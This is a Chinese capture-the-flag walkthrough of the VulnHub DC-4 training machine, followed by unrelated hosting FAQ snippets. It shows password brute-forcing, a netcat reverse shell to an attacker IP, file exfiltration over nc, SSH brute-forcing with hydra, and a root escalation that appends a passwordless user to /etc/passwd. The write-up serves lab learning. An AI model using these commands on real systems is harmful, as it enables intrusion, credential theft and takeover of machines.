DC-4 靶场通关小记

news/2025/1/8 14:30:34/文章来源:https://www.cnblogs.com/lrui1/p/18656923

地址 https://www.vulnhub.com/entry/dc-4,313/

1. 环境配置

有其他兼容性问题参考 https://www.cnblogs.com/lrui1/p/18655388

2. 信息收集

fscan.exe -h 192.168.74.0/24 -nobr -nopoc
fscan.exe -h 192.168.74.132 -p 1-65535
# 22 80
python dirsearch.py -u http://192.168.74.132/
python cmseek.py -u http://192.168.74.132/

啥也没有,测试SQL注入无报错,直接爆破admin密码,用rockyou.txt字典,下载地址如下

https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

爆破得出账号密码如下

admin
123456a

3. 尝试GetShell

系统后台可以执行以下命令

ls -l
du -h
df -h

抓包,发送whoami,成功执行,无过滤

反弹shell

ncat -lvnp 4444
nc -c /bin/bash 192.168.74.129 4444

成功获取Shell

4. 提权

目标分析,获取系统账号

使用ls -la查看当前Web目录,是没有写权限的

使用cat /etc/passwd有3个用户

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

都点击去访问,/home/jim目录下有一个backups,里面有一个文件名为old-passwords.bak

使用 nc 传输文件

# hacker
ncat -lvvp 2333 > old-passwords.bak
# victim(反弹shell中)
nc 192.168.74.129 2333 < old-passwords.bak

打开,发现是一个词典,使用hydra SSH爆破jim密码

hydra -l jim -P old-passwords.bak 192.168.74.132 ssh
···
[22][ssh] host: 192.168.74.132   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
···

得到账号/密码 jim/jibril04

获取root权限

查找所有具有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

用户家目录有一个suid的sh文件,且该文件对所有用户可写

修改文件的内容如下

/bin/bash -p

未成功

查找内核漏洞

searchsploit Debian 9

内核版本不满足漏洞利用要求

查看邮件日志信息

cat /var/mail/jim# 也可通过交互式控制台查找
mail
1

得到以下信息

Hi Jim,I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.Password is:  ^xHhA&hvim0ySee ya,
Charles

转到charles的账号

su charles

查看是否具有sudo权限和sudo权限的命令范围

sudo -l

采用teehee提权

echo "hacker::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su hacker

image.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/865212.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何解决超过1GB的文件压缩包上传失败的问题?

遇到超过1GB的文件压缩包上传失败的情况,通常可能是由于网络连接不稳定、FTP服务器配置限制或本地网络环境问题引起的。为了帮助您顺利解决问题,您可以按照以下步骤进行排查和处理:检查网络稳定性:首先,请确认您的网络连接是否稳定。由于上传大文件需要长时间保持稳定的网…

如何处理云服务器远程桌面访问问题

问题描述: 用户报告无法通过Web界面访问云服务器的远程桌面,怀疑可能是VNC固定端口受到攻击或端口未开放导致的问题。用户希望了解如何解决远程桌面访问失败的问题。 解决方案:确认远程桌面连接方式: 确保您使用的远程桌面连接工具和协议正确无误。常见的远程桌面工具包括:…

SSL证书部署后仍无法正常访问网站怎么办?

问题描述: 已经购买并上传了SSL证书到虚拟主机,但网站仍然无法通过HTTPS协议正常访问。如何排查和解决这一问题? 解决方案: 当您已经购买并上传了SSL证书到虚拟主机,但网站仍然无法通过HTTPS协议正常访问时,这可能是由于多个环节的问题所引起的。以下是详细的排查步骤和解…

如何解决远程登录问题

如果您遇到远程登录问题,可以按照以下步骤进行排查:检查SSH端口号:默认情况下,SSH端口号为22。如果您的服务器配置了非默认端口号(如22000),请确保使用正确的端口号进行连接。 您可以通过命令行工具(如 ssh)指定端口号进行连接,例如:ssh user@server_ip -p 22000。防…

如何实现网站代码自动恢复修改

在网站开发和维护过程中,有时会不小心修改了重要的代码文件,导致网站出现问题。如何实现网站代码的自动恢复,以避免数据丢失? 解决方案:使用版本控制系统:使用Git等版本控制系统来管理网站代码。版本控制系统可以帮助你跟踪每次修改的历史记录,方便回滚到之前的稳定版本…

如何高效地修改网站上的公司信息?

要高效地修改网站上的公司信息,请按照以下步骤操作:确定需要更新的内容:列出所有需要更新的公司信息项,如公司名称、地址、电话号码、邮箱地址等。 查找相关文件:定位到包含这些信息的文件或数据库表。通常情况下,这类信息会出现在首页、关于我们页面、联系我们页面等位置…

灵活定制,掌握网站模板全面修改的方法

网站模板的全面修改可以帮助您打造独特的品牌形象和用户体验。以下是具体操作指南:修改内容 方法页面布局 在后台的“模板”或“外观”选项中,选择要修改的模板文件(如index.htm),直接编辑HTML结构。也可以使用可视化编辑器调整布局。内容模块 进入“内容管理”模块,找到…

网站后台是否支持代码修改?

许多内容管理系统(CMS)提供了后台管理界面,用户可以通过这些界面进行内容更新和配置调整。但有时需要直接修改代码来实现特定功能或修复问题。 解决方案:了解权限:首先确认您是否有足够的权限访问和修改代码。某些CMS可能限制了普通用户的代码编辑权限。 使用开发者模式:…

MobaxTerm不能用ssh命令

问题1:MobaxTerm不能用ssh命令 1.1 症状 MobaxTerm版本:21.5用MobaXterm新建session去ssh正常。 用MobaXterm手动ssh失败,提示➤ ssh root@172.1.1.5 /etc/ssh_config line 8: Bad SSH2 cipher spec aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes256-gcm@ope…

如何安全有效地修改网站首页图片以提升视觉效果

问题描述 如何在网站首页安全有效地修改图片,确保最终效果既美观又实用? 回答内容 修改网站首页图片是提升视觉效果和用户体验的重要步骤。以下是详细的指南,帮助您顺利完成这一任务:准备新的图片:确保新图片为常见的图像格式(如PNG、JPEG),并且尺寸适中,通常宽度为19…

如何在网站后台修改代码?

在网站后台修改代码是一个常见的需求,尤其是在使用内容管理系统(CMS)时。以下是详细的步骤和建议:登录网站后台:打开浏览器,输入网站后台的URL,通常是http://域名/admin或http://域名/dede。 输入用户名和密码登录。进入代码编辑页面:根据网站使用的CMS,找到代码编辑选…

服务器密码重置及SSH连接失败的解决方案

当您遇到服务器密码重置后仍然无法通过SSH连接的问题时,可能是由于以下几个原因造成的。以下是详细的排查步骤和解决方案:确认密码修改成功:确认您在云平台上重置密码的操作已完成,并记下新的密码。 尝试使用云平台提供的控制台链接验证新密码是否生效。检查云锁设置:有时…